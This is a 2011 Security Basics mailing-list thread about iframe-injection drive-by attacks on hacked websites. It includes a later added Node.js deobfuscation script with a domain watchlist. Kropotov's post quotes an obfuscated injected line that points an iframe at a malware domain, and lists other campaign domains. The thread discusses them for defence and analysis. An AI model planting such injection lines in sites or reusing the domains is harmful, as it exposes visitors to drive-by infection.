Security Basics mailing list archives

RE: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!


From: "Kropotov, Vladimir B." <vbkropotov () tnk-bp com>
Date: Fri, 9 Sep 2011 12:36:01 +0400

Hello list.
Because this problem seems to be global, here are my 2 cents..

This activity was found using IBM ISS about 1 month ago.
Attack scheme:
A) Participants
Site with malware (1) 
Hacked Site (2) 
User host with browser (3)

B) Actions (source, target, action)
b1. (1) -> (2) -> script injection
b2. (2) -> (3) -> script execution
b3. (3) -> (1) -> exploit download
b4. (3) -> (3) -> exploit execution with the rights of the current user

C) What we know about them:
(1) just registered, to a fake person
(1) has a lifetime of about 1 week
(1) moves from old to new domains
(1) some domains appear in blacklists, but only after their lifetime
(1) domain samples: inaptly.in, unaropanda.in, sonorophone.in, etc.;
~100 domains known
(1) at the time of first appearance, the majority of domains were hosted
in Romania, now in the USA
(2) Ordinary sites, which possibly use the same content management
system, but maybe not...
(3) Knows nothing about the possible malicious content on (2)
(1)(2) at the beginning of August we found some signatures where the
exploit was located on the hacked site, but over time the scheme moved
to B)
b1. Nothing, we do not control the Internet
b2. In the current scheme the attackers employ an IDS evasion technique.
Here's the sample we caught: script
document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
b3. It looks like the loaded exploit depends on the user environment. The
script (the sample we caught) checks the OS (Win, FreeBSD, Mac, iPhone,
Linux, etc...), the browser and browser version (IE, Gecko, Opera,
Safari, Chrome, etc.), browser plugins, whether ActiveX is enabled,
Shockwave Flash, wmplayer, Adobe Reader, etc....
 
If someone would like to continue, it will be useful for all!


regards
Vladimir B. Kropotov
Information Security Department

TNK-BP.com
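[Editor's note, added example; this is not code from the original post, from TNK-BP or from the attackers.] The 'htt'+'p://'+... splitting in the snippet quoted above only has to defeat a naive signature: the pieces are plain string literals joined with '+', so they can be folded back together statically, without loading the page in a browser (which, as Henri points out below, could infect the analyst's machine). The script below does exactly that on a constructed copy of the quoted snippet, re-joined onto one line, pulls out the iframe.src assignment, and checks the recovered hostname against a watchlist built from the domains named in this post. SAMPLE, WATCHLIST and the function names are this example's own; the only real data are the domain strings copied from the post.

```javascript
// Added example: statically fold string-concatenation obfuscation and
// recover the injected iframe URL without executing the script.

// Constructed sample: the snippet quoted in the post, re-joined onto one
// line. It is treated purely as data here and is never executed.
const SAMPLE =
  "document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';";

// Constructed watchlist: domains named in the post as part of this campaign.
const WATCHLIST = new Set([
  'inaptly.in', 'unaropanda.in', 'sonorophone.in', 'disregarding.in',
]);

// A single- or double-quoted literal with no escapes or embedded quotes,
// which is all this obfuscation style uses.
const LITERAL_RE = /'[^'\\]*'|"[^"\\]*"/g;

// Two or more such literals joined by '+'. Whitespace and line breaks are
// allowed around the operator because mail and HTML wrapping insert them.
const CONCAT_RE = /(?:'[^'\\]*'|"[^"\\]*")(?:\s*\+\s*(?:'[^'\\]*'|"[^"\\]*"))+/g;

// Replace every 'a'+'b'+'c' run with the single literal 'abc'.
function foldConcatenations(src) {
  return src.replace(CONCAT_RE, (run) => {
    const pieces = (run.match(LITERAL_RE) || []).map((p) => p.slice(1, -1));
    return "'" + pieces.join('') + "'";
  });
}

// All http(s) URLs visible once the concatenations are folded.
function extractUrls(src) {
  return foldConcatenations(src).match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// Make a URL safe to paste into a report or ticket.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Find iframe.src assignments of a string literal (either quote style) in
// the folded script and report whether the host is on the watchlist.
function findInjections(src) {
  const folded = foldConcatenations(src);
  const assignRe = /iframe\.src\s*=\s*(['"])([^'"]*)\1/g;
  const results = [];
  let m;
  while ((m = assignRe.exec(folded)) !== null) {
    const url = m[2];
    let host = null;
    try {
      host = new URL(url).hostname.toLowerCase();
    } catch (e) {
      host = null; // relative or malformed target: still report it
    }
    results.push({
      url,
      host,
      watchlisted: host !== null && WATCHLIST.has(host),
      defanged: defang(url),
    });
  }
  return results;
}

function main() {
  for (const hit of findInjections(SAMPLE)) {
    console.log(hit);
  }
}

main();
```

Run it with `node`; for the sample it reports one hit whose host, disregarding.in, is on the watchlist. The same folding can be run over every page of the affected site (or over the IDS capture) to locate the injected script, which is the safe alternative to opening the page in a browser.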



-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of Henri Salo
Sent: Thursday, September 08, 2011 8:12 PM
To: charlie () funkymunkey com
Cc: security-basics () securityfocus com; shervin () debug ir
Subject: Re: There is a strange GET request header in all web pages of
my site? I'm worried about a Trojan attack!

On Thu, Sep 08, 2011 at 09:51:42AM +0100, charlie () funkymunkey com wrote:
> That isn't 'a' header, it's a whole GET request and response. I'm
> assuming there is a bit of javascript that appears on every page of
> your site that makes the browser send this GET request. The best
> option would be to load up your website in a browser and look
> through the code or look through the code on the web server and find
> out where that request is coming from.
> At least you can be sure that nothing malicious is going on from
> your website as this request is met by a 404 meaning that the
> supposed malicious script does not exist.

No, he should NOT go there using a normal browser. If this is a drive-by
attack the URL might come alive and he would get infected. At the least I
suggest he disable JavaScript, but that might not help if the URL is
using another attack vector like a vulnerability in the PDF reader or
browser. I would like to investigate this issue, but I haven't received
the URL to the web site even though I requested it.

Best regards,
Henri Salo

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an
SSL certificate.  We look at how SSL works, how it benefits your company
and how your customers can tell if a site is secure. You will find out
how to test, purchase, install and use a thawte Digital Certificate on
your Apache web server. Throughout, best practices for set-up are
highlighted to help you ensure efficient ongoing management of your
encryption keys and digital certificates.

http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
------------------------------------------------------------------------

